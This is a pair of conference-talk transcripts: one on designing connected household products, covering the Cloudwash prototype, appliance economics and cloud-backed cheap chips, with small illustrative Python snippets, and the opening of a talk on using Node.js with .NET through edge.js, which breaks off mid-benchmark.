There's a little picture of a pad with a pencil on it. I mean, it's not brilliant, but at least it's there. And you click on it and a thing opens and you can hit the keyboard and the letters appear and you kind of get it, right? You're using the software. Same thing with Photoshop. You want to do a little drawing, you just scrub your mouse around and you kind of go, all right, this is Photoshop. But if you want to use Python, which, with its libraries and extensibility, is easily as powerful as Photoshop, and is in that computer, I mean, I bought it, you have to type the word python in a little black window, probably in the right way as well. I don't know what else you have to do, but I think you just type python and then press return. And then it says: type help, copyright, credits or license for more information. I'm like, what is this? And it turns out it's an absolutely giant, amazing piece of software with absolutely no formal representation to me. It makes no effort whatsoever to make itself perceivable to me. Which, for people who have spent a long time learning how to use command lines and type esoteric characters in a row in order to make very powerful software work, probably seems fairly natural. But from my perspective, it's utterly bizarre that so much effort would go into something that then goes out of its way, almost, to remain entirely opaque. Anyway, systems. So on to another thing, back a little bit to things: this is a thing called the Gartner hype cycle. It's brilliant. It's absolutely brilliant. And you must all go and Google for the Gartner hype cycle. It's one of my favorite pieces of internet comedy. Basically, there's this big company in America called Gartner, and there are massive numbers of MBA nerds, all of the kind of guys from Stanford and Accenture and Harvard that have just thought about business and nothing else for a year and a half.
They go out and read all the tech press and gather together all the knowledge about technology. And then they produce this graph, once every three or four months I think, but mainly once a year. This one is from July 2013. And they plot the technology that's being chatted about at the moment onto what's called the hype cycle. And at the beginning they have this thing called the innovation trigger. So this is the stuff that's happening in all the labs at Imperial and MIT, the first piece of E Ink, the first computer vision that can tell when someone's smiling, all of those sorts of things. And then it moves up to the peak of inflated expectations. So you can see up there, back in July 2013, consumer 3D printing. Everyone was talking about how we're all going to have a 3D printer, there's going to be one in every corner shop, it's going to be the new photocopier, that kind of thing. And then you come down to the trough of disillusionment, when things slide off there. You have things like cloud computing and mesh network sensors, very, very unfashionable at the time, just down in the doldrums. And slowly, over time, they pick up into the slope of enlightenment, where you've got things like biometric authentication. And if you go further up, things like speech recognition reach the plateau of productivity. For a long time people were like, speech recognition? No one wants to talk to computers. And now it's all that Google and Apple can bang on about, right? It's raced right to the end there. So what we find, though, is that the stuff that's most interesting is there, in the trough. It's the stuff that's quite cheap now. You think about RFID, which has never really left the trough of disillusionment. It's never quite managed to find a massive, secure market for itself. But it's fascinating.
The reason why the things here are fascinating is because they're usually disproportionately cheap, especially when there's a hardware component. So if you went to a lab and tried to make one RFID chip, one tag, for the first time, I mean, someone must have done it, the cost must have been incalculable. It's a computer that you power with the electricity in the air, and it turns on and emits a meaningful signal through this paper-thin thread of copper back to a reader. It's exquisite. Just the level of physical engineering. Forget the software and all that; just the physical manufacturing engineering to usefully and consistently replicate that process. Forget about plastic boxes that go around the back of things. This is a computer in something less than the size of a playing card. And now, if you wanted to buy 10,000 of them, they'd cost you less than a penny each. But to make one is incalculable. So it's a very interesting space to look at. So I wanted to talk a little bit about some of the properties of a connected thing. And one of the things that's unusual about it is that it is software that is somewhere. Normally, in my experience, software exists as an abstract idea, in that it is something replicable. It's quite often based in the web. When you use something like Flickr or Instagram, you don't really think of it as being somewhere. Where it is doesn't really matter. You feel like you have a view onto a system, and you are making judgments and deriving value from that view. But this is the thing that you press in order to cross the street. When you press that, what you're really doing is using a piece of software that you can only really use in that place. So that button only exists there. So you do that piece of UI and the street changes. And probably some massive, scary system goes into operation, and all of the traffic signals in London realign themselves by a few milliseconds or whatever.
And the world changes slightly. And so it's really located. To give you a bit more of a concrete point, this is a cheesy, old-fashioned view of how people once consumed television, in America certainly. The television was a rare device. There wasn't one in every room. So it sat in a room and people gathered around it. Lots of people looking at one piece of media, having a shared experience of it. It's happening in the corner of that room. It doesn't happen in other places, except for other places where there are televisions. So the weird thing about that is this, and I've always found this quite a puzzle. If I've got my Netflix on and I'm signed into my TV and my girlfriend comes and wants to watch TV, legally, really, she kind of can't, because it's my account. And if she does buy some paid-for content through the Amazon Prime thing, or whatever service we're actually using, some sort of pay-as-you-view, on-demand, HBO Go type service, then it's my money. It's me that it costs money from. Plus, a lot of Netflix's model is a recommendations engine, just as Amazon have, which means suddenly I'm getting weird recommendations for films I maybe don't have an interest in, and the model sort of begins to break. I mean, it's most conspicuous to me with iTunes, where you're constantly having to sign in and prove who you are in order to spend any money on it. I see why, because kids run up like $6,000 app bills on Smurf Kingdom or whatever they're buying, a jar of rainbows or a bag of stars or whatever. But I'm 38. I'm pretty sure I don't want to have to sign into my TV in order to watch it. It's just an odd security thing. It's a bit like it's there in case someone comes to my house and steals the TV.
So, it's the middle of the night, like two in the morning, and I'm like, oh, what's going on? And I hear noises downstairs, and I gently pad down to my living room, and there's like three guys in balaclavas downloading The Hobbit. You know? And I think that might be the least of my problems at that moment. So there's just something odd about the model here, of something which is a television, which is a profoundly shared object. It lives in a house; people have expectations of how it will behave; it's public. It's not in my pocket. It's not my device. It exists for people. But it's inherited a model that's derived entirely from single sign-on, on phones. And there's something there which doesn't quite fit. I mean, you can see Apple beginning to address it at their WWDC thing the other day: they announced this family sharing thing, so someone can actually buy something and give permission to someone else, so you don't have this kind of odd thing. And it's mostly, I think, because iPads are usually shared devices. They live in houses. Anyway, it's just a kind of interesting quirk in the way that software is being constructed in that space. So, in the kind of work we do (we, as a startup, still work with manufacturers, and sometimes manufacturers use our system with their products; that's one of our business models), we are often asked what the point is of putting connectivity into products. And it's a very reasonable question. So I thought I'd have a go at answering it. And this is Robot JFK: it's not what your product can do for software, it's what software can do for your product. So, I'm a little bit concerned about the time; I don't want to run out. I don't have any sound, unfortunately, but this is from the keynote that Steve Jobs made in 2007 where he announced the iPhone. And I'm going to play it. You won't be able to hear it.
But you can see what he's mentioned there on the slide: visual voicemail. He's saying, wouldn't it be great if you didn't have to listen to the four voicemails that you've already heard to get to the new one, which is number five, every time you want to check it. You just want it to appear in a list. And this is a little bit astounding to me, really. He mentions it again; he comes back to this idea of visual voicemail. Just think about that. You've just launched your iPhone. It's a complete paradigm shift in the product market. No one can make this. You're literally inventing manufacturing technology. Your operations guy, Tim Cook, has sourced completely unique deals around the chips to get the bill of materials to the point it is. You've probably had four guys sitting in a basement, PhDs, just grinding out the maths to make pinch zooming work on something that's basically less powerful than a Raspberry Pi. And you're still talking about visual voicemail. Forget about Candy Crush Saga, or Rovio and Angry Birds, or the fact it's got a physics engine sitting in it and is going to be more powerful than an Xbox in six generations. He's just talking about this quite modest, simple, utilitarian value: you don't have to listen to the four voicemails that you have before you get to number five. And I think for designers, that's a really important lesson, because it's just sensible. The problem in the business logic of the way manufacturers sit with software is that manufacturers are historically extremely bad at addressing their consumers. You know, if you think about a company like Electrolux, which owns many washing machine brands in Europe, they really don't know who you are and they're really not that interested. They'd much rather turn a handle in a factory and have big lumps of white metal go out the door and end up in retailers.
And the people that actually sell that stuff are local marketing teams, or the retailers themselves. I mean, the idea that manufacturers brand objects at all is quite weird: that this is an AEG washing machine or a Miele washing machine. It's a bit like saying, I've got a Foxconn phone that's running Apple software. Why? Who cares who made it? And I think in a culture where we understand the value of products to be associated with the services that they have, that feels very different. I mean, can you imagine? This is just an extraordinary story. There was a time, and I'm looking out there and I think we're all going to remember Walkmans; no one can pretend they're too young to remember Walkmans. So can you imagine: you're Sony. You've probably got the largest distribution and operational empire on the planet. No one can put chips and plastic in a hopper and get it into every store on the planet faster and cheaper than you. You've got a premium brand. You even own a slice of Chinese banking. You've got the PlayStation brand, and there's this thing called Walkman. So you're easily the coolest thing on the street. It's portable music. You own all of it. Panasonic? Who? Nothing. Just forget it. There's nothing out there. You actually define the data formats for media storage and then license them to other companies, and everyone just chooses to use them. Plus, you've got Sony Music in the States; you legally own like half the music library, probably everything Madonna has ever written, and Britney Spears and Michael Jackson. And then within, what, three years, some tiny little pissant beige computer manufacturer on the West Coast has just ironed your brand off the map. It just doesn't exist anymore. I mean, they must be pushing their fingernails through their hands. It's incalculable how stupid that was, to let that go.
I'm a designer, but speaking to business nerds, they all kind of look away when you talk about Sony Walkman. That was a bad one. And it's extraordinary how poorly manufacturers understand consumer behaviors and habits. And the one thing they want back from you, and they don't even really want it, you know, is that little postcard for the warranty. That's their equivalent of an Apple ID. That's their Gmail address, as far as they're concerned. That's all they want to know. And they'll see you later, going and buying the cassettes from the store, you know. And so it's just grossly broken. This is what you get if you go to Sony.com recently. Do you want to be marketed to in American or Norwegian? That's the question you're presented with when you go to Sony.com. Whereas if you go to Google.com, you get one of the most powerful tools in living memory. Or if you go to Apple.com, you get sold an iPad, and they do that well. So it's a phenomenally weak way of actually understanding consumers. There's just no way that manufacturers are going to be the people that own the logic of this space, or occupy it in our public imaginations in terms of how connected products will work. Because the reality of a connected product is really just an extension of a piece of software. It happens to be manufactured by someone who isn't Apple or Amazon in that instance. Maybe you manufacture it. Maybe someone else manufactures it. But the reality is, it's software that reaches a place that was hard to reach before. Yeah, he mentions it again. I won't click through this, as there's no sound. So, to take it back to industrial design, and where the value of this kind of stuff probably is in the short term, in terms of how connected products in domestic environments can advance: once there was this company in Britain called Singer, and it made sewing machines. They're very important. This thing has a treadle on it.
You'd pump that with your foot, and it turns the spindle, and that makes the sewing machine go. At some point, a smart person went: hey, electricity and motors. That's handy. You don't have to do the treadle anymore. This must have been quite a serious undertaking for a company that basically made cast-iron mechanical stuff: to turn into a company that injection-molded what's really a piece of consumer electronics. But they did. So in a way, I think what we're looking for are the few humble steps that mean connected products are marginally more useful than their unconnected ancestors. So here's Whirlpool, another big consumer electronics brand that deals with this kind of space. Let's just have a brief look at what they're doing in this environment at the moment. So this is from Whirlpool: introducing Whirlpool smart appliances. You know smart means something like this is going on, right? Some computer business beyond just the embedded software in a chip that makes the water get hot and cold. With Sixth Sense Live TM technology. Better get that trademark in; don't want anyone stealing Sixth Sense Live. This is what they're saying. And these are two of the products in the list. And these are real things; you can buy them. You can really go to the store and buy this. I haven't got one of these, and I haven't spent a lot of time playing with them, but let's just speculate for a minute on the dishwasher here. The three unique selling points of this product, with its Sixth Sense Live technology, start with remote control lock. Try and imagine this. You've got your dishwasher. You've slotted it in. The plumber's come in, put it in there, there's a hole in your kitchen, you've got it in there. It cost you some $400 more than exactly the same dishwasher that doesn't have Sixth Sense Live technology in it. Now you've got to get it on your Wi-Fi.
I mean, you've got a Samsung TV with a whole screen and a remote control with 600 buttons, and it's hard to get on the Wi-Fi. Here you've got a dishwasher with like six buttons. Can you imagine trying to type in a WEP key with like seven buttons and no screen? Who knows how that magic works? Maybe it's Bluetooth and there's some magical pairing thing. Let's just assume it's Bluetooth, and you just go near it and it knows that that's the phone it's slaved to, or something like that. And they've thought about that. And you get it in there. And this is so you can launch an app, which you then have to find on the app store. So you go to the app store, find the app for this model's Sixth Sense Live technology, download it, and it comes down so that you can open the door of your dishwasher with your phone. When do you want to open the door of your dishwasher when you're not at your dishwasher? It's completely ludicrous. Imagine the money: given what we've just seen about how manufacturing is a miserable business, it costs a fortune, billions of dollars, it sits on container ships for months before you even get to charge for the product. And all you're doing with it is opening the door with your phone. It's just ridiculous, profoundly ridiculous. And of course we thought we could do better, because we know it all. So we made our own washing machine, which we literally built, called Cloudwash. And it's a prototype. We're not manufacturing washing machines. No, that's going to be someone else's pain. But we basically did a few things where we took an existing washing machine, an Electrolux washing machine as it turns out, and we hacked it. So the first thing we wanted to understand is how washing machines really work from a manufacturer's point of view. So we added some of our own connectivity in there, and we realized that, lo and behold, we can control it.
So if you press the start button at the bottom there (helpful video person), the light goes on in the background. And we also thought about how the machine might change in order to accommodate the network. What sort of things do you need on a machine in order to talk meaningfully to the person using it about what's happening? What are the new functions and new activities you can associate with it that help it to be more useful than washing machines were before? Because I don't see that many people complaining about washing machines. I mean, we're not sitting here in dirty clothes, so they can't work that badly. So one of the things we realized was that no one uses the 17 different presets on the first wheel. So we just made a little e-ink display where you can change the presets to the three things you mostly use and label them properly. Then you can see when the wash is going to finish. For those people who do washing, that's a big deal, because you don't want your clothes sitting in a stagnant, damp, closed washing machine growing mold. And you can turn the notifications on and off. The thing we stumbled over, though, that was perhaps most profound is the last two buttons on it. When you run out of liquid, you're at the machine. That's when you know you've run out of washing liquid or detergent. And we configured this machine so that when you press the detergent button, it orders you some from Amazon. Or it adds it to your Ocado list. And this is the thing that caught people's attention: we put this on the internet, and many people looked at it and wrote blogs about it and things like that. I'll come back to the button in a minute. This is John Lewis in London, and that's the John Lewis washing machine. John Lewis are a retailer, just a big, nice, posh department store. This is the John Lewis washing machine. Really, this is an Electrolux washing machine. It's actually a Zanussi washing machine, which is an Electrolux brand.
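The detergent-button idea above, one physical button mapped to one pre-configured reorder, can be sketched roughly like this. The product codes, machine ID, and order-building function are all hypothetical; the talk doesn't describe Cloudwash's actual implementation, so this is just the shape of the logic, with a real build swapping the final step for an HTTP call to a retailer's ordering API.

```python
# Hypothetical sketch: each physical button on the machine maps to one
# pre-configured replenishment item. SKUs and machine ID are invented.
BUTTON_PRODUCTS = {
    "detergent": {"sku": "DETERGENT-1L", "qty": 1},
    "conditioner": {"sku": "CONDITIONER-1L", "qty": 1},
}

def build_order(button: str, machine_id: str) -> dict:
    """Turn a button press into an order payload for a retailer API."""
    item = BUTTON_PRODUCTS[button]
    return {
        "machine": machine_id,
        "sku": item["sku"],
        "quantity": item["qty"],
    }

# A button press on the machine would produce something like:
order = build_order("detergent", "cloudwash-001")
```

The point is how little the device itself has to do: the button press just names a pre-agreed product, and everything else (payment, delivery) lives with the retailer.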
So in Electrolux, every single washing machine that doesn't have a screen has the same printed circuit board in it. The LEDs behind the buttons are in the same places for every single Zanussi, AEG, la la la, Electrolux washing machine on the market. The dial is in the same place, proportionally. If you were to measure them on every single different brand, they would all be in the same place, because the circuit board is literally identical. So all John Lewis have done is ask Zanussi to supply them with a special machine, and they've changed the fascia. They've just changed the plastic on the front, stuck the John Lewis brand on it, and now they're saying it's their machine. And this is the way that OEMs and manufacturing work. It's all a big lazy system of deals and shipping and stuff like that. But what's interesting about it is that they charge £50 more for this machine than they do for the equivalent Zanussi model, which is literally the same engine. It's the same circuit board. It's just got different plastic. If you open up a washing machine, there are two circuit boards. There's one at the front, which is called the interface board, and a control board that sits at the back. The interface board does the buttons and dials and the program stuff, and the control board at the back is the bit that makes sure your house doesn't catch fire or flood, that all the motors get controlled and the tachometer is reporting properly. That's the bit that does the heavy lifting. So it's relatively easy to intervene in that front board. This is the board that's in every single low-end Electrolux washing machine, on every brand. That board is called the EWM2200. It stands for Electrolux washing machine 2200. There isn't this massive diversity of electronics.
It's extremely simple, what's going on here. And that chip right in the middle there is a relatively straightforward microcontroller. It's not running Linux, it's not doing anything scary. The Raspberry Pi looks like God to it. It's a really, really humble tiny little thing. There's nothing on here that's that expensive. And this is where we come back to the button. If you speak to manufacturers like Samsung or Electrolux, companies that make kitchen goods or houseware goods, they have a metric about these machines, which is the value of the FMCG that goes through them. One of the reasons why the fridge is so significant to a company like Samsung is that you put £3,000 through it every year, compared to only £400 through your washing machine. So that's why they're interested in the fridge: because the value of the services associated with that product is much, much higher than for other products in the kitchen. Your toaster just makes toast, and bread is cheap as chips. So they're not as interested in it in terms of the service. Then there's this entire area of supermarkets, right? Everything you see on these shelves only exists because of machines. Of course there were detergents before, but dishwasher tablets, these little gels, all of that kind of stuff, the whole universe of those things, they're only about servicing those machines. So really, you buy a washing machine, and it consumes power and electricity and water. We know that. But it also consumes conditioner, little tablets, descalers. These are vast, squillion-dollar industries. Those companies are rich, right? Procter & Gamble aren't going home hungry. There's a lot of money in Unilever getting you to buy weird little liquid tabs with like three compartments and a little yellow gel and the blue gel and a kind of little yin-yang shape on it, all of that kind of stuff. And so if you think about it, here's a Nespresso machine. Nespresso don't manufacture those machines.
Krups and Magimix manufacture them. Nespresso sell you these coffee pods. Those coffee pods are about 37 pence each. Think about how much coffee is in a tiny aluminium packet. We're talking about an unimaginable luxury markup. It makes Apple's margins look modest. We're talking about a sort of seven, maybe 8,000 per cent markup on that coffee compared to what you get when you buy beans or ground. Even Starbucks are like, whoa, that's good. You know, you go to Starbucks and you buy two pence worth of coffee for £3.90. That's why there are so many coffee shops. It's biblically profitable. There's literally nothing like it. So Nespresso don't make those machines. They design them. They own all the patents on them. They give it away to someone else to make, and they want to get it into your house as cheaply as possible, because what they want to do is sell you 37 pence capsules. If the washing machine has got a buy-now button on it for the goods that flow through it, the £400, £500 a year of stuff inside it, then Unilever might as well give you a washing machine with the button to their goods on it. If you press that button, you're buying their Persil. You're never going to go to the shop and buy another brand. You just go: buy now. It's like on your iPhone: people buy apps twice because they forgot their password. It's just easier. It's just that kind of stuff. So for me, some of the connectivity value, and the disruption in the way the businesses work, is that the services and systems and economics of those machines may get radically disrupted. And it's not Electrolux or Sony that are going to do that. It's retailers. It's Amazon. Yeah, Amazon have Whispernet, which is the component, the relationship and technology, in the Kindle which allows you to download books when you're on holiday.
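The pod markup is easiest to sanity-check per kilogram. The numbers below are assumptions for illustration only: the 37p pod price comes from the talk, but the grams per pod and the supermarket ground-coffee price are my guesses, and the multiple you get moves around a lot depending on what you compare against.

```python
# Rough per-kilogram arithmetic behind the pod-coffee markup claim.
# All inputs are assumed figures, not verified prices.
POD_PRICE_GBP = 0.37         # ~37p per capsule, as quoted in the talk
GRAMS_PER_POD = 5.0          # assumed; pods hold very little coffee
GROUND_PRICE_PER_KG = 12.0   # assumed supermarket ground coffee, GBP/kg

# Scale the pod price up to a price per kilogram of coffee.
pod_price_per_kg = POD_PRICE_GBP / GRAMS_PER_POD * 1000

# Multiple versus buying the same weight of ordinary ground coffee.
ratio = pod_price_per_kg / GROUND_PRICE_PER_KG

print(f"Pod coffee: £{pod_price_per_kg:.0f}/kg, "
      f"about {ratio:.1f}x the price of ground coffee")
```

With these assumed numbers the pods work out around £74/kg, several times the price of ground coffee; the talk's "7,000 to 8,000 per cent" figure presumably compares against cheaper raw beans, so treat the exact multiple as rhetorical.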
If you go on holiday and you're walking on a bus and you think, oh, I want to get the new Dan Brown or new Harry Potter 20, you know, off you go, you do that. The publisher pays for the data transfer and it has come magically through the air, right? Through some weird deal making with all the 3G companies in the world, Vodafone and Sprint in the US and whoever it is. And it just works. You're a consumer. You don't have to pay a bill. It's being dealt with in the background. So if Amazon took that technology and flipped it open so that anyone could put essentially a Whispernet component in their consumer devices, then you'd end up with something quite radical. What if they just supplied that chip? It's not hard. That chip's been around for a decade. I mean, it used to be powerful. It's probably powerful enough to run cruise missiles, but you know, most things are these days. It's just not hard to get powerful chips, especially if all you've got to do is turn a drum and a few motors and sensors. So for a very, very small adjustment to the bill of materials of this device, it becomes a unique purchasing point for FMCG companies. Last point, I'm going to be quick, only eight and a half minutes. This is one that you're going to know more about than I do. So please forgive me for just continuing to belittle you with simple and ridiculous truisms that you probably wrote all the software for in actuality. But I think this is one of the most brilliant things that's ever happened. And I think few people realize that when you go onto Google and you kind of go, ah, pizza, or Angelina Jolie's got really nice cheekbones, whatever you've written, right? And it kind of goes out and you go, no, not that one. You go Penguin and it goes, ah, Penguin. No, not that Penguin, Batman Penguin, you know, all that kind of stuff. And you just kind of ask it things. And look at this, 213 million results in a quarter of a second. I mean, you know more than I do, right?
But like that for me is like comparable to like the fucking moon landing or something in terms of like engineering effort. How do you get that to happen? You know, it's really amazing. It's at any moment and anyone can do it right now, sort of for free. And I think there's something happening around cloud computing, which, you know, you won't need to hear from me, which is this idea that you can get almost infinite computing power associated with very, very modest computers. So this in the bottom right corner here, this is a company called ARM that you will know about. And they have a prototyping system called mbed, which is "embed" without the E, so it's just M-B-E-D, if you know what I mean. And it's a bit like their kind of Raspberry Pi Arduino sort of thing. It's a prototyping kind of hardware. This is the cheapest board they do that can meaningfully handle audio. It costs about five pounds for the whole development board. So let's just say the chip's a pound. Very, very low, simple costs, you know, down in the gutter compared to iPhones and TV set top boxes and stuff like that. And there you've got the cloud. So let's just say that's all of Google, right? What that means is essentially you can speak into that chip literally just with your voice and say pizza and it can read out to you the actual answers, 213 million results. The challenge is only to make it perceivable to the person using it. But what's interesting is that historically you needed big computers to do big tasks and now you don't. There's something about objects like this, simple, cheap junk that you bought in the supermarket, that's actually able to take advantage of the kind of computing power you just can't put in a room unless you're Amazon and Google. Just big scary server farms. And we've done some projects recently that kind of take advantage of that and it's very weird.
You've got this tiny little idea of a processor with like a little bit of UI on it and it's doing all of Google at you. It's very, very powerful. It feels extraordinary. Yeah. All right, I'm going to skip this one. I'm afraid of... Oh, no, I'm all right. I've got five minutes. There's a project we did with Google. So we work with big technology companies mostly in the US, like Google and Intel, et cetera, et cetera, thinking about new forms of UI, new kinds of things they can do with their systems, and we did a project called Lamps. Now, basically, the weird thing about Google is they're so extraordinarily rich. I've never come across anything like it in terms of how loose they are with their money. They just kind of go, we like you guys, what do you want to do? We're like, well, normally with clients, you do what you're told, so why don't you tell us what to do? And they're like, no, just do what you want to do. And I've heard they did this kind of book scanning thing where they're like, yeah, we're just going to take all the books in the whole of history and make them part of the internet, so we can scan them and do more AdWords. And we're like, okay, and how do you do that? And they're like, well, we just built a big giant system of robots and interns and basically we just read all the books with a computer. And these machines are incredible, right? So they've got these scanners that get books. And because books aren't really 2D, they've got bow in them and flex, they have like a lidar, like a Kinect, a laser scanner that shoots at the book, that scans the 3D surface of the book on that page. And then it takes 16 photos at every focal plane across that depth.
And then it takes the 3D data and all 16 photos and chooses which part of the photo is in focus given the actual depth of the book at that point, and restitches together a magical 3D version of the book where all bits of it are in focus, and then uses that as the source of the optical character recognition it uses to generate the text in the book. You're like, what? And then some poor intern goes, you know, turns a page, click, does it again. That's amazing. I can imagine if you had that as like a domestic product. Imagine if you just made that part of your desk. Imagine if on your work desk, you had this thing that can scan anything, read anything, and maybe project back out. So we did a project where we got a bunch of Kinects, laser scanners, high definition cameras and projectors and started trying to read, analyze and project back out what it was seeing on the desk, so that the things in the world sort of become magically computational. We made a short film. So we made these blocks, which is really a game about where the computing happens. This is real projection. This isn't doing any real computer vision. It's just real projection in one of the early video prototypes. We did do real stuff, but we were also doing this kind of fake stuff. This is just a wooden block with some springs in it. But when you use it and you play with it, there's no electronics in it, no signals being sent to the computer. When you press those buttons, the computer just sees that you're pressing the button, changes what it's projecting on it and starts playing music. So this weird dumb block, this just dumb, completely analog lump of wood, suddenly becomes like it's computational, even though the computing is happening in a server somewhere, or on a computer locally, or in this weird lamp that we've got set up. Anyway, it's a very interesting project.
But just again, this is that reinforced point about when you free yourself from the idea that computing cycles are rare and you say you can have as many as you want, then the objects in the world start to change quite radically. We make everything. He has to make everything he is thinking about in order to express it. It's from a film called Close Encounters of the Third Kind, and poor old Richard Dreyfuss gets obsessed with an alien landing and starts continually building this mountain. If you get the reference, it makes sense because you're a sci-fi nerd. If you don't, apologies, it's a bit weird. Why do any of this? is a really good question. And this is usually something I say to designers, because as software people and developers, you're already doing it. But one of the things I like, this is from a blog post on the O'Reilly Radar. O'Reilly, a big technical publisher, no doubt you know them. And Steve Jobs says, we believe that it's technology married with the humanities that yields us the results that make our hearts sing. And the post writer, Doug Hill, says that basically he was saying that Apple products have soul and that people are attracted to those products because they can feel that soul both consciously and unconsciously. And there's just something nice. When software is doing something really good, when it's beautiful, it's just like the most extraordinary stuff that's ever happened. And that's why I continue to work in it and why I think most people should, because configuring your Samsung Wi-Fi is miserable and it doesn't have to be. Thanks. Paper in a box. There's a green bit of paper or a red bit of paper or a yellow bit of paper depending on how stupid you think I've been. And you put them in a little plastic box and that tells the organizers how bad it was as an idea to bring me here.
Jack Schulze will unpack the emerging design domain of connected products and design for the technology landscape. Using examples from BERG's work and from industry, Jack will shed light on the core challenge of representing systems through interfaces in the emerging world of connected devices, and share principles from BERG's design process. He will discuss the friction between manufacture and software, and the power of thought leadership through good communications and prototyping. Finally, Jack will focus in on two great opportunities in the connected product space. Firstly, outlining how the real power of the cloud and cheap chips can outstrip the most powerful smartphones. Secondly, looking at which new kinds of functionality are the most disruptive to business and how this can be used to design new and exciting products.
10.5446/50540 (DOI)
If technology will cooperate. So my name is David Neal. You can find me on the Twitter at reverentgeek. I blog at a few places, and you can trust me because I consume a lot of bacon and caffeine. And in case you haven't figured it out by now, I'm from America. And I come from a very special part of America called the South, so I speak fluent redneck. So I hope you can understand my English. I work for a company called LeanKit. We make project management software for kanban, and I'm a developer advocate. I work on our APIs and integrations with other tools like Microsoft TFS and Project Server, Oracle Primavera, Jira, and GitHub. So what we're talking about is why Node.js and .NET, what makes sense. We're going to look at edge.js and some demos and some tips that I've learned from working with the tool, and we'll wrap up by talking about some alternative strategies for using Node and .NET together. So what's up with Node.js? Anybody here actively developing on Node? A few of you? Awesome. So in case you've been under a rock, Node.js has just exploded over the last few years and has just made a lot of press, gotten a lot of attention, and has certainly been something that I have noticed and wanted to explore for a long time. But for me, coming from a .NET background, there was always some kind of barrier or some kind of showstopper for me in the .NET world that I live in that kept me from really adopting and using Node.js a lot. So I got to play around with it some. I pick it up every now and again. But until edge.js came out, I really couldn't find a compelling reason to continue working on it. So what's so great about Node.js? Well, first of all, it's JavaScript. It's JavaScript on the server. And like it or not, for better or worse, JavaScript has become, you know, one of the most important languages in the world.
You know, it drives the Internet, the Internet of Things; platforms, all kinds of tools and databases and other services are now centered around JavaScript. You can use JavaScript as their language. It's here to stay. Node.js is built on Chrome's V8, and so it harnesses the Chrome V8 JavaScript engine to run. And along with that, I'm sorry, I've got this little window popped up here, it's built from the ground up around JavaScript to run on this asynchronous event loop. So it is single threaded, but because it's designed from the ground up so that the paradigm is asynchronous programming, there's some crazy awesome things it can do around concurrency and data manipulation and streaming. It's, you know, one of the first platforms to have WebSockets and all kinds of newer Web technologies. And so there's a great scalability story there, there's a great concurrency story. So there's a lot of compelling reasons to look at Node. And then the community itself has just exploded around Node.js; it's been embraced by people from all different platforms. And you know, you have the ability to focus on one language, JavaScript, from top to bottom. So from the back end, from databases to the server to the front end. And it allows you to, you know, stay focused on that one language and be extremely efficient across all tiers. Last time I checked, there were over 73,000 packages, Node modules. So these are community contributed. So the community itself is, you know, kind of like the app store: just about anything you want to do with Node, there's probably a dozen modules or packages that are available to accomplish that task. So there's tons of resources. Web frameworks, REST APIs, testing, templating, socket libraries, NoSQL databases, messaging, just about anything you can think of. And even Microsoft has taken notice. So since 2010, Microsoft has been engaged.
And you know, one of the first steps that they made was they had this guy, Tomasz Janczuk, who later wrote edge.js. He was the guy instrumental in porting, you know, ensuring that Node.js would run on Windows. Node.js originally did not run on Windows. And of course, now Node.js is a first class citizen in Azure. JavaScript is an important language for Microsoft. You know, with WinRT and so forth, you've got JavaScript in Windows 8 that you can program with. So it hasn't escaped the eye of Microsoft as well. So other reasons: there's a great article on NearForm called Why Node.js is becoming the go-to technology in the enterprise. And so there's lots of case studies available. So some of the feedback from this article, as well as personal feedback I've gotten from my coworkers and from other folks that have gone to Node.js, is rapid innovation delivery, developer happiness, attract and retain talent, performance. There's a lot of compelling reasons. One of those case studies being PayPal: they had two teams working in parallel, one who was brand new to Node, and their other team working in Java. And this was their experience. They built the same solution on both platforms. In Node, they built almost twice as fast with fewer people, wrote it in 33 percent fewer lines of code, and so forth. Decreased response time and increased requests per second. And this is a quote from this case study: like many others, we slipped Node.js in the door as a prototyping platform, and like many others, it proved extremely proficient. We decided to give it a go in production. So it's like, you know, once you try it, it's like you've got to do some more. So what are some use cases for Node? Basically it's perfect for anything web. Single page apps, real time. The things that we kind of expect from modern web applications, that we've come to expect because of like Facebook being, you know, near real time. It uses WebSockets.
You can build REST APIs. The ubiquitous Hello World app for Node.js is a chat client. It makes it, you know, trivial to connect multiple clients together over sockets and be able to communicate and pass messages and so forth. There's a great case study with Walmart. They've taken the approach, a migration strategy, of going from the Java that they currently use to Node, and they're using like a proxy service. They've got Node sitting in the middle that's exposing all their APIs. Some of them are native Node and some of them get passed on to their legacy systems, but they're having, you know, extremely great success in adopting Node. So why .NET? Well, .NET has a great legacy as well. There are over 23,000 NuGet packages last time I checked. SQL Server is not a bad relational database. I come from, you know, pretty much a predominantly Microsoft shop. My whole career has been on the Microsoft platform, and so this was like one of the deal breakers for me for a long time: Node.js really didn't have a great SQL Server driver. So you couldn't access SQL Server, and so, you know, if you're on the Microsoft stack, it's like SQL Server is immediately assumed. It's like, what application are we going to build on top of SQL Server? You know, it's not a question. So Microsoft Office, integrating with Office and doing, you know, generating documents or processing documents, that's important. Windows Azure: they have a lot of REST APIs exposed, but to build applications and services and things on Azure, you know, still all the tooling and everything that's available, .NET is still the best direction to go there. And, you know, a lot of Microsoft infrastructure: Exchange, SharePoint, and also hardware, you know, device drivers, Win32 drivers.
I know from experience, like in manufacturing, that there are lots of hardware components, hardware devices, where, you know, Win32 is really the only option for managing those devices. So what is edge.js? Like I already mentioned, Tomasz Janczuk, who worked on the port of Node.js, or support for Node.js, on IIS, he's got a lot of, you know, internal knowledge of how Node works. So he developed this module for Node that allows Node to run .NET in process. So it's not a cross-process call or shelling out to a Node application separately. .NET is loaded up and is run in the same process. And so there's very low latency. It's not just C# as you would assume. It also supports F#, calling ADO.NET directly, Python and PowerShell. And you can also execute .NET code either inline, so inside your JavaScript file, you can have .NET code in the same file, or you can have separate files like a .cs file or .csx, or you can reference other assemblies. And so up until now, the story for adding new features onto Node, for developing new modules and so forth, you had two choices. One is either write it in JavaScript, and if you couldn't do it in JavaScript, you had to write a module in C. And so edge.js now gives us the capability to write new features or new modules for Node and not have to go to C for that. So, warning: benchmark ahead. I don't know if you're like me or not, but I'm kind of leery anytime I see benchmarks from people. So I've seen some benchmarks with edge.js, but I needed to know for myself. So I went and did basically the same kind of benchmark comparisons that are available on Edge's website. So what you see here on the first is a call to a JavaScript function. So that's a native function to function call. The latency of that call is somewhere around .005 milliseconds. Here in the middle is edge.js to a C# function or C# assembly. It's actually inline code is what I tested.
